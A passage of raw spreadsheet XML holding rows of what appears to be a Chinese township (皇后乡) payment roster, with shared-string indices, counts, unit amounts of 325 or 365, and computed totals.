        <v>1</v>
      </c>
      <c r="H1777" s="25">
        <v>365</v>
      </c>
      <c r="I1777" s="24">
        <f t="shared" si="27"/>
        <v>365</v>
      </c>
      <c r="J1777" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1777" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1778" customHeight="1" spans="1:11">
      <c r="A1778" s="23" t="s">
        <v>4779</v>
      </c>
      <c r="B1778" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="C1778" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="D1778" s="24" t="s">
        <v>4780</v>
      </c>
      <c r="E1778" s="24" t="s">
        <v>4738</v>
      </c>
      <c r="F1778" s="24" t="s">
        <v>4710</v>
      </c>
      <c r="G1778" s="24">
        <v>2</v>
      </c>
      <c r="H1778" s="25">
        <v>325</v>
      </c>
      <c r="I1778" s="24">
        <f t="shared" si="27"/>
        <v>650</v>
      </c>
      <c r="J1778" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1778" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1779" customHeight="1" spans="1:11">
      <c r="A1779" s="23" t="s">
        <v>4781</v>
      </c>
      <c r="B1779" s="24" t="str">
        <f>B1778</f>
        <v>皇后乡</v>
      </c>
      <c r="C1779" s="24" t="str">
        <f>C1778</f>
        <v>皇后乡</v>
      </c>
      <c r="D1779" s="23" t="s">
        <v>4782</v>
      </c>
      <c r="E1779" s="23" t="s">
        <v>4783</v>
      </c>
      <c r="F1779" s="24" t="str">
        <f>F1778</f>
        <v>4113210615</v>
      </c>
      <c r="G1779" s="24"/>
      <c r="H1779" s="24"/>
      <c r="I1779" s="24">
        <f t="shared" si="27"/>
        <v>0</v>
      </c>
      <c r="J1779" s="24"/>
      <c r="K1779" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1780" customHeight="1" spans="1:11">
      <c r="A1780" s="23" t="s">
        <v>4784</v>
      </c>
      <c r="B1780" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="C1780" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="D1780" s="24" t="s">
        <v>4785</v>
      </c>
      <c r="E1780" s="24" t="s">
        <v>4709</v>
      </c>
      <c r="F1780" s="24" t="s">
        <v>4710</v>
      </c>
      <c r="G1780" s="24">
        <v>2</v>
      </c>
      <c r="H1780" s="25">
        <v>325</v>
      </c>
      <c r="I1780" s="24">
        <f t="shared" si="27"/>
        <v>650</v>
      </c>
      <c r="J1780" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1780" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1781" customHeight="1" spans="1:11">
      <c r="A1781" s="23" t="s">
        <v>4786</v>
      </c>
      <c r="B1781" s="24" t="str">
        <f>B1780</f>
        <v>皇后乡</v>
      </c>
      <c r="C1781" s="24" t="str">
        <f>C1780</f>
        <v>皇后乡</v>
      </c>
      <c r="D1781" s="23" t="s">
        <v>4787</v>
      </c>
      <c r="E1781" s="23" t="s">
        <v>4788</v>
      </c>
      <c r="F1781" s="24" t="str">
        <f>F1780</f>
        <v>4113210615</v>
      </c>
      <c r="G1781" s="24"/>
      <c r="H1781" s="24"/>
      <c r="I1781" s="24">
        <f t="shared" si="27"/>
        <v>0</v>
      </c>
      <c r="J1781" s="24"/>
      <c r="K1781" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1782" customHeight="1" spans="1:11">
      <c r="A1782" s="23" t="s">
        <v>4789</v>
      </c>
      <c r="B1782" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="C1782" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="D1782" s="24" t="s">
        <v>703</v>
      </c>
      <c r="E1782" s="24" t="s">
        <v>4716</v>
      </c>
      <c r="F1782" s="24" t="s">
        <v>4710</v>
      </c>
      <c r="G1782" s="24">
        <v>2</v>
      </c>
      <c r="H1782" s="25">
        <v>325</v>
      </c>
      <c r="I1782" s="24">
        <f t="shared" si="27"/>
        <v>650</v>
      </c>
      <c r="J1782" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1782" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1783" customHeight="1" spans="1:11">
      <c r="A1783" s="23" t="s">
        <v>4790</v>
      </c>
      <c r="B1783" s="24" t="str">
        <f>B1782</f>
        <v>皇后乡</v>
      </c>
      <c r="C1783" s="24" t="str">
        <f>C1782</f>
        <v>皇后乡</v>
      </c>
      <c r="D1783" s="23" t="s">
        <v>4791</v>
      </c>
      <c r="E1783" s="23" t="s">
        <v>4792</v>
      </c>
      <c r="F1783" s="24" t="str">
        <f>F1782</f>
        <v>4113210615</v>
      </c>
      <c r="G1783" s="24"/>
      <c r="H1783" s="24"/>
      <c r="I1783" s="24">
        <f t="shared" si="27"/>
        <v>0</v>
      </c>
      <c r="J1783" s="24"/>
      <c r="K1783" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1784" customHeight="1" spans="1:11">
      <c r="A1784" s="23" t="s">
        <v>4793</v>
      </c>
      <c r="B1784" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="C1784" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="D1784" s="24" t="s">
        <v>4794</v>
      </c>
      <c r="E1784" s="24" t="s">
        <v>2199</v>
      </c>
      <c r="F1784" s="24" t="s">
        <v>4710</v>
      </c>
      <c r="G1784" s="24">
        <v>1</v>
      </c>
      <c r="H1784" s="25">
        <v>365</v>
      </c>
      <c r="I1784" s="24">
        <f t="shared" si="27"/>
        <v>365</v>
      </c>
      <c r="J1784" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1784" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1785" customHeight="1" spans="1:11">
      <c r="A1785" s="23" t="s">
        <v>4795</v>
      </c>
      <c r="B1785" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="C1785" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="D1785" s="24" t="s">
        <v>4796</v>
      </c>
      <c r="E1785" s="24" t="s">
        <v>4797</v>
      </c>
      <c r="F1785" s="24" t="s">
        <v>4710</v>
      </c>
      <c r="G1785" s="24">
        <v>1</v>
      </c>
      <c r="H1785" s="25">
        <v>365</v>
      </c>
      <c r="I1785" s="24">
        <f t="shared" si="27"/>
        <v>365</v>
      </c>
      <c r="J1785" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1785" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1786" customHeight="1" spans="1:11">
      <c r="A1786" s="23" t="s">
        <v>4798</v>
      </c>
      <c r="B1786" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="C1786" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="D1786" s="24" t="s">
        <v>4799</v>
      </c>
      <c r="E1786" s="24" t="s">
        <v>4800</v>
      </c>
      <c r="F1786" s="24" t="s">
        <v>4710</v>
      </c>
      <c r="G1786" s="24">
        <v>2</v>
      </c>
      <c r="H1786" s="25">
        <v>325</v>
      </c>
      <c r="I1786" s="24">
        <f t="shared" si="27"/>
        <v>650</v>
      </c>
      <c r="J1786" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1786" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1787" customHeight="1" spans="1:11">
      <c r="A1787" s="23" t="s">
        <v>4801</v>
      </c>
      <c r="B1787" s="24" t="str">
        <f>B1786</f>
        <v>皇后乡</v>
      </c>
      <c r="C1787" s="24" t="str">
        <f>C1786</f>
        <v>皇后乡</v>
      </c>
      <c r="D1787" s="23" t="s">
        <v>4802</v>
      </c>
      <c r="E1787" s="85" t="s">
        <v>4743</v>
      </c>
      <c r="F1787" s="24" t="str">
        <f>F1786</f>
        <v>4113210615</v>
      </c>
      <c r="G1787" s="24"/>
      <c r="H1787" s="24"/>
      <c r="I1787" s="24">
        <f t="shared" si="27"/>
        <v>0</v>
      </c>
      <c r="J1787" s="24"/>
      <c r="K1787" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1788" customHeight="1" spans="1:11">
      <c r="A1788" s="23" t="s">
        <v>4803</v>
      </c>
      <c r="B1788" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="C1788" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="D1788" s="24" t="s">
        <v>4804</v>
      </c>
      <c r="E1788" s="24" t="s">
        <v>4805</v>
      </c>
      <c r="F1788" s="24" t="s">
        <v>4710</v>
      </c>
      <c r="G1788" s="24">
        <v>2</v>
      </c>
      <c r="H1788" s="25">
        <v>325</v>
      </c>
      <c r="I1788" s="24">
        <f t="shared" si="27"/>
        <v>650</v>
      </c>
      <c r="J1788" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1788" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1789" customHeight="1" spans="1:11">
      <c r="A1789" s="23" t="s">
        <v>4806</v>
      </c>
      <c r="B1789" s="24" t="str">
        <f>B1788</f>
        <v>皇后乡</v>
      </c>
      <c r="C1789" s="24" t="str">
        <f>C1788</f>
        <v>皇后乡</v>
      </c>
      <c r="D1789" s="23" t="s">
        <v>4807</v>
      </c>
      <c r="E1789" s="23" t="s">
        <v>4808</v>
      </c>
      <c r="F1789" s="24" t="str">
        <f>F1788</f>
        <v>4113210615</v>
      </c>
      <c r="G1789" s="24"/>
      <c r="H1789" s="24"/>
      <c r="I1789" s="24">
        <f t="shared" si="27"/>
        <v>0</v>
      </c>
      <c r="J1789" s="24"/>
      <c r="K1789" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1790" customHeight="1" spans="1:11">
      <c r="A1790" s="23" t="s">
        <v>4809</v>
      </c>
      <c r="B1790" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="C1790" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="D1790" s="24" t="s">
        <v>4810</v>
      </c>
      <c r="E1790" s="24" t="s">
        <v>4811</v>
      </c>
      <c r="F1790" s="24" t="s">
        <v>4710</v>
      </c>
      <c r="G1790" s="24">
        <v>2</v>
      </c>
      <c r="H1790" s="25">
        <v>325</v>
      </c>
      <c r="I1790" s="24">
        <f t="shared" si="27"/>
        <v>650</v>
      </c>
      <c r="J1790" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1790" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1791" customHeight="1" spans="1:11">
      <c r="A1791" s="23" t="s">
        <v>4812</v>
      </c>
      <c r="B1791" s="24" t="str">
        <f>B1790</f>
        <v>皇后乡</v>
      </c>
      <c r="C1791" s="24" t="str">
        <f>C1790</f>
        <v>皇后乡</v>
      </c>
      <c r="D1791" s="23" t="s">
        <v>4813</v>
      </c>
      <c r="E1791" s="23" t="s">
        <v>4814</v>
      </c>
      <c r="F1791" s="24" t="str">
        <f>F1790</f>
        <v>4113210615</v>
      </c>
      <c r="G1791" s="24"/>
      <c r="H1791" s="24"/>
      <c r="I1791" s="24">
        <f t="shared" si="27"/>
        <v>0</v>
      </c>
      <c r="J1791" s="24"/>
      <c r="K1791" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1792" customHeight="1" spans="1:11">
      <c r="A1792" s="23" t="s">
        <v>4815</v>
      </c>
      <c r="B1792" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="C1792" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="D1792" s="24" t="s">
        <v>4816</v>
      </c>
      <c r="E1792" s="24" t="s">
        <v>4817</v>
      </c>
      <c r="F1792" s="24" t="s">
        <v>4710</v>
      </c>
      <c r="G1792" s="24">
        <v>2</v>
      </c>
      <c r="H1792" s="25">
        <v>325</v>
      </c>
      <c r="I1792" s="24">
        <f t="shared" si="27"/>
        <v>650</v>
      </c>
      <c r="J1792" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1792" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1793" customHeight="1" spans="1:11">
      <c r="A1793" s="23" t="s">
        <v>4818</v>
      </c>
      <c r="B1793" s="24" t="str">
        <f>B1792</f>
        <v>皇后乡</v>
      </c>
      <c r="C1793" s="24" t="str">
        <f>C1792</f>
        <v>皇后乡</v>
      </c>
      <c r="D1793" s="23" t="s">
        <v>4819</v>
      </c>
      <c r="E1793" s="23" t="s">
        <v>4820</v>
      </c>
      <c r="F1793" s="24" t="str">
        <f>F1792</f>
        <v>4113210615</v>
      </c>
      <c r="G1793" s="24"/>
      <c r="H1793" s="24"/>
      <c r="I1793" s="24">
        <f t="shared" si="27"/>
        <v>0</v>
      </c>
      <c r="J1793" s="24"/>
      <c r="K1793" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1794" customHeight="1" spans="1:11">
      <c r="A1794" s="23" t="s">
        <v>4821</v>
      </c>
      <c r="B1794" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="C1794" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="D1794" s="24" t="s">
        <v>4822</v>
      </c>
      <c r="E1794" s="24" t="s">
        <v>4727</v>
      </c>
      <c r="F1794" s="24" t="s">
        <v>4710</v>
      </c>
      <c r="G1794" s="24">
        <v>1</v>
      </c>
      <c r="H1794" s="25">
        <v>365</v>
      </c>
      <c r="I1794" s="24">
        <f t="shared" si="27"/>
        <v>365</v>
      </c>
      <c r="J1794" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1794" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1795" customHeight="1" spans="1:11">
      <c r="A1795" s="23" t="s">
        <v>4823</v>
      </c>
      <c r="B1795" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="C1795" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="D1795" s="24" t="s">
        <v>4824</v>
      </c>
      <c r="E1795" s="24" t="s">
        <v>4825</v>
      </c>
      <c r="F1795" s="24" t="s">
        <v>4710</v>
      </c>
      <c r="G1795" s="24">
        <v>1</v>
      </c>
      <c r="H1795" s="25">
        <v>365</v>
      </c>
      <c r="I1795" s="24">
        <f t="shared" si="27"/>
        <v>365</v>
      </c>
      <c r="J1795" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1795" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1796" customHeight="1" spans="1:11">
      <c r="A1796" s="23" t="s">
        <v>4826</v>
      </c>
      <c r="B1796" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="C1796" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="D1796" s="24" t="s">
        <v>4827</v>
      </c>
      <c r="E1796" s="24" t="s">
        <v>4828</v>
      </c>
      <c r="F1796" s="24" t="s">
        <v>4710</v>
      </c>
      <c r="G1796" s="24">
        <v>1</v>
      </c>
      <c r="H1796" s="25">
        <v>365</v>
      </c>
      <c r="I1796" s="24">
        <f t="shared" ref="I1796:I1859" si="28">H1796*G1796</f>
        <v>365</v>
      </c>
      <c r="J1796" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1796" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1797" customHeight="1" spans="1:11">
      <c r="A1797" s="23" t="s">
        <v>4829</v>
      </c>
      <c r="B1797" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="C1797" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="D1797" s="24" t="s">
        <v>4830</v>
      </c>
      <c r="E1797" s="24" t="s">
        <v>4831</v>
      </c>
      <c r="F1797" s="24" t="s">
        <v>4710</v>
      </c>
      <c r="G1797" s="24">
        <v>1</v>
      </c>
      <c r="H1797" s="25">
        <v>365</v>
      </c>
      <c r="I1797" s="24">
        <f t="shared" si="28"/>
        <v>365</v>
      </c>
      <c r="J1797" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1797" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1798" customHeight="1" spans="1:11">
      <c r="A1798" s="23" t="s">
        <v>4832</v>
      </c>
      <c r="B1798" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="C1798" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="D1798" s="24" t="s">
        <v>4833</v>
      </c>
      <c r="E1798" s="24" t="s">
        <v>4716</v>
      </c>
      <c r="F1798" s="24" t="s">
        <v>4710</v>
      </c>
      <c r="G1798" s="24">
        <v>2</v>
      </c>
      <c r="H1798" s="25">
        <v>325</v>
      </c>
      <c r="I1798" s="24">
        <f t="shared" si="28"/>
        <v>650</v>
      </c>
      <c r="J1798" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1798" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1799" customHeight="1" spans="1:11">
      <c r="A1799" s="23" t="s">
        <v>4834</v>
      </c>
      <c r="B1799" s="24" t="str">
        <f>B1798</f>
        <v>皇后乡</v>
      </c>
      <c r="C1799" s="24" t="str">
        <f>C1798</f>
        <v>皇后乡</v>
      </c>
      <c r="D1799" s="23" t="s">
        <v>3790</v>
      </c>
      <c r="E1799" s="23" t="s">
        <v>4835</v>
      </c>
      <c r="F1799" s="24" t="str">
        <f>F1798</f>
        <v>4113210615</v>
      </c>
      <c r="G1799" s="24"/>
      <c r="H1799" s="24"/>
      <c r="I1799" s="24">
        <f t="shared" si="28"/>
        <v>0</v>
      </c>
      <c r="J1799" s="24"/>
      <c r="K1799" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1800" customHeight="1" spans="1:11">
      <c r="A1800" s="23" t="s">
        <v>4836</v>
      </c>
      <c r="B1800" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="C1800" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="D1800" s="24" t="s">
        <v>4837</v>
      </c>
      <c r="E1800" s="24" t="s">
        <v>4838</v>
      </c>
      <c r="F1800" s="24" t="s">
        <v>4710</v>
      </c>
      <c r="G1800" s="24">
        <v>2</v>
      </c>
      <c r="H1800" s="25">
        <v>325</v>
      </c>
      <c r="I1800" s="24">
        <f t="shared" si="28"/>
        <v>650</v>
      </c>
      <c r="J1800" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1800" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1801" customHeight="1" spans="1:11">
      <c r="A1801" s="23" t="s">
        <v>4839</v>
      </c>
      <c r="B1801" s="24" t="str">
        <f>B1800</f>
        <v>皇后乡</v>
      </c>
      <c r="C1801" s="24" t="str">
        <f>C1800</f>
        <v>皇后乡</v>
      </c>
      <c r="D1801" s="23" t="s">
        <v>4840</v>
      </c>
      <c r="E1801" s="23" t="s">
        <v>4841</v>
      </c>
      <c r="F1801" s="24" t="str">
        <f>F1800</f>
        <v>4113210615</v>
      </c>
      <c r="G1801" s="24"/>
      <c r="H1801" s="24"/>
      <c r="I1801" s="24">
        <f t="shared" si="28"/>
        <v>0</v>
      </c>
      <c r="J1801" s="24"/>
      <c r="K1801" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1802" customHeight="1" spans="1:11">
      <c r="A1802" s="23" t="s">
        <v>4842</v>
      </c>
      <c r="B1802" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="C1802" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="D1802" s="24" t="s">
        <v>4843</v>
      </c>
      <c r="E1802" s="24" t="s">
        <v>4844</v>
      </c>
      <c r="F1802" s="24" t="s">
        <v>4710</v>
      </c>
      <c r="G1802" s="24">
        <v>2</v>
      </c>
      <c r="H1802" s="25">
        <v>325</v>
      </c>
      <c r="I1802" s="24">
        <f t="shared" si="28"/>
        <v>650</v>
      </c>
      <c r="J1802" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1802" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1803" customHeight="1" spans="1:11">
      <c r="A1803" s="23" t="s">
        <v>4845</v>
      </c>
      <c r="B1803" s="24" t="str">
        <f>B1802</f>
        <v>皇后乡</v>
      </c>
      <c r="C1803" s="24" t="str">
        <f>C1802</f>
        <v>皇后乡</v>
      </c>
      <c r="D1803" s="23" t="s">
        <v>4846</v>
      </c>
      <c r="E1803" s="23" t="s">
        <v>4847</v>
      </c>
      <c r="F1803" s="24" t="str">
        <f>F1802</f>
        <v>4113210615</v>
      </c>
      <c r="G1803" s="24"/>
      <c r="H1803" s="24"/>
      <c r="I1803" s="24">
        <f t="shared" si="28"/>
        <v>0</v>
      </c>
      <c r="J1803" s="24"/>
      <c r="K1803" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1804" customHeight="1" spans="1:11">
      <c r="A1804" s="23" t="s">
        <v>4848</v>
      </c>
      <c r="B1804" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="C1804" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="D1804" s="24" t="s">
        <v>4849</v>
      </c>
      <c r="E1804" s="24" t="s">
        <v>4850</v>
      </c>
      <c r="F1804" s="24" t="s">
        <v>4710</v>
      </c>
      <c r="G1804" s="24">
        <v>1</v>
      </c>
      <c r="H1804" s="25">
        <v>365</v>
      </c>
      <c r="I1804" s="24">
        <f t="shared" si="28"/>
        <v>365</v>
      </c>
      <c r="J1804" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1804" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1805" customHeight="1" spans="1:11">
      <c r="A1805" s="23" t="s">
        <v>4851</v>
      </c>
      <c r="B1805" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="C1805" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="D1805" s="24" t="s">
        <v>4852</v>
      </c>
      <c r="E1805" s="24" t="s">
        <v>4853</v>
      </c>
      <c r="F1805" s="24" t="s">
        <v>4710</v>
      </c>
      <c r="G1805" s="24">
        <v>2</v>
      </c>
      <c r="H1805" s="25">
        <v>325</v>
      </c>
      <c r="I1805" s="24">
        <f t="shared" si="28"/>
        <v>650</v>
      </c>
      <c r="J1805" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1805" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1806" customHeight="1" spans="1:11">
      <c r="A1806" s="23" t="s">
        <v>4854</v>
      </c>
      <c r="B1806" s="24" t="str">
        <f>B1805</f>
        <v>皇后乡</v>
      </c>
      <c r="C1806" s="24" t="str">
        <f>C1805</f>
        <v>皇后乡</v>
      </c>
      <c r="D1806" s="23" t="s">
        <v>4855</v>
      </c>
      <c r="E1806" s="23" t="s">
        <v>4761</v>
      </c>
      <c r="F1806" s="24" t="str">
        <f>F1805</f>
        <v>4113210615</v>
      </c>
      <c r="G1806" s="24"/>
      <c r="H1806" s="24"/>
      <c r="I1806" s="24">
        <f t="shared" si="28"/>
        <v>0</v>
      </c>
      <c r="J1806" s="24"/>
      <c r="K1806" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1807" customHeight="1" spans="1:11">
      <c r="A1807" s="23" t="s">
        <v>4856</v>
      </c>
      <c r="B1807" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="C1807" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="D1807" s="24" t="s">
        <v>4857</v>
      </c>
      <c r="E1807" s="24" t="s">
        <v>4838</v>
      </c>
      <c r="F1807" s="24" t="s">
        <v>4710</v>
      </c>
      <c r="G1807" s="24">
        <v>2</v>
      </c>
      <c r="H1807" s="25">
        <v>325</v>
      </c>
      <c r="I1807" s="24">
        <f t="shared" si="28"/>
        <v>650</v>
      </c>
      <c r="J1807" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1807" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1808" customHeight="1" spans="1:11">
      <c r="A1808" s="23" t="s">
        <v>4858</v>
      </c>
      <c r="B1808" s="24" t="str">
        <f>B1807</f>
        <v>皇后乡</v>
      </c>
      <c r="C1808" s="24" t="str">
        <f>C1807</f>
        <v>皇后乡</v>
      </c>
      <c r="D1808" s="23" t="s">
        <v>4859</v>
      </c>
      <c r="E1808" s="23" t="s">
        <v>4860</v>
      </c>
      <c r="F1808" s="24" t="str">
        <f>F1807</f>
        <v>4113210615</v>
      </c>
      <c r="G1808" s="24"/>
      <c r="H1808" s="24"/>
      <c r="I1808" s="24">
        <f t="shared" si="28"/>
        <v>0</v>
      </c>
      <c r="J1808" s="24"/>
      <c r="K1808" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1809" customHeight="1" spans="1:11">
      <c r="A1809" s="23" t="s">
        <v>4861</v>
      </c>
      <c r="B1809" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="C1809" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="D1809" s="24" t="s">
        <v>4862</v>
      </c>
      <c r="E1809" s="24" t="s">
        <v>4828</v>
      </c>
      <c r="F1809" s="24" t="s">
        <v>4710</v>
      </c>
      <c r="G1809" s="24">
        <v>2</v>
      </c>
      <c r="H1809" s="25">
        <v>325</v>
      </c>
      <c r="I1809" s="24">
        <f t="shared" si="28"/>
        <v>650</v>
      </c>
      <c r="J1809" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1809" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1810" customHeight="1" spans="1:11">
      <c r="A1810" s="23" t="s">
        <v>4863</v>
      </c>
      <c r="B1810" s="24" t="str">
        <f>B1809</f>
        <v>皇后乡</v>
      </c>
      <c r="C1810" s="24" t="str">
        <f>C1809</f>
        <v>皇后乡</v>
      </c>
      <c r="D1810" s="23" t="s">
        <v>4864</v>
      </c>
      <c r="E1810" s="23" t="s">
        <v>4865</v>
      </c>
      <c r="F1810" s="24" t="str">
        <f>F1809</f>
        <v>4113210615</v>
      </c>
      <c r="G1810" s="24"/>
      <c r="H1810" s="24"/>
      <c r="I1810" s="24">
        <f t="shared" si="28"/>
        <v>0</v>
      </c>
      <c r="J1810" s="24"/>
      <c r="K1810" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1811" customHeight="1" spans="1:11">
      <c r="A1811" s="23" t="s">
        <v>4866</v>
      </c>
      <c r="B1811" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="C1811" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="D1811" s="24" t="s">
        <v>4867</v>
      </c>
      <c r="E1811" s="24" t="s">
        <v>4825</v>
      </c>
      <c r="F1811" s="24" t="s">
        <v>4710</v>
      </c>
      <c r="G1811" s="24">
        <v>2</v>
      </c>
      <c r="H1811" s="25">
        <v>325</v>
      </c>
      <c r="I1811" s="24">
        <f t="shared" si="28"/>
        <v>650</v>
      </c>
      <c r="J1811" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1811" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1812" customHeight="1" spans="1:11">
      <c r="A1812" s="23" t="s">
        <v>4868</v>
      </c>
      <c r="B1812" s="24" t="str">
        <f>B1811</f>
        <v>皇后乡</v>
      </c>
      <c r="C1812" s="24" t="str">
        <f>C1811</f>
        <v>皇后乡</v>
      </c>
      <c r="D1812" s="23" t="s">
        <v>4869</v>
      </c>
      <c r="E1812" s="23" t="s">
        <v>4838</v>
      </c>
      <c r="F1812" s="24" t="str">
        <f>F1811</f>
        <v>4113210615</v>
      </c>
      <c r="G1812" s="24"/>
      <c r="H1812" s="24"/>
      <c r="I1812" s="24">
        <f t="shared" si="28"/>
        <v>0</v>
      </c>
      <c r="J1812" s="24"/>
      <c r="K1812" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1813" customHeight="1" spans="1:11">
      <c r="A1813" s="23" t="s">
        <v>4870</v>
      </c>
      <c r="B1813" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="C1813" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="D1813" s="24" t="s">
        <v>4871</v>
      </c>
      <c r="E1813" s="24" t="s">
        <v>4872</v>
      </c>
      <c r="F1813" s="24" t="s">
        <v>4710</v>
      </c>
      <c r="G1813" s="24">
        <v>1</v>
      </c>
      <c r="H1813" s="25">
        <v>365</v>
      </c>
      <c r="I1813" s="24">
        <f t="shared" si="28"/>
        <v>365</v>
      </c>
      <c r="J1813" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1813" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1814" customHeight="1" spans="1:11">
      <c r="A1814" s="23" t="s">
        <v>4873</v>
      </c>
      <c r="B1814" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="C1814" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="D1814" s="24" t="s">
        <v>4874</v>
      </c>
      <c r="E1814" s="24" t="s">
        <v>4853</v>
      </c>
      <c r="F1814" s="24" t="s">
        <v>4710</v>
      </c>
      <c r="G1814" s="24">
        <v>2</v>
      </c>
      <c r="H1814" s="25">
        <v>325</v>
      </c>
      <c r="I1814" s="24">
        <f t="shared" si="28"/>
        <v>650</v>
      </c>
      <c r="J1814" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1814" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1815" customHeight="1" spans="1:11">
      <c r="A1815" s="23" t="s">
        <v>4875</v>
      </c>
      <c r="B1815" s="24" t="str">
        <f>B1814</f>
        <v>皇后乡</v>
      </c>
      <c r="C1815" s="24" t="str">
        <f>C1814</f>
        <v>皇后乡</v>
      </c>
      <c r="D1815" s="23" t="s">
        <v>4876</v>
      </c>
      <c r="E1815" s="32" t="s">
        <v>4877</v>
      </c>
      <c r="F1815" s="24" t="str">
        <f>F1814</f>
        <v>4113210615</v>
      </c>
      <c r="G1815" s="24"/>
      <c r="H1815" s="24"/>
      <c r="I1815" s="24">
        <f t="shared" si="28"/>
        <v>0</v>
      </c>
      <c r="J1815" s="24"/>
      <c r="K1815" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1816" customHeight="1" spans="1:11">
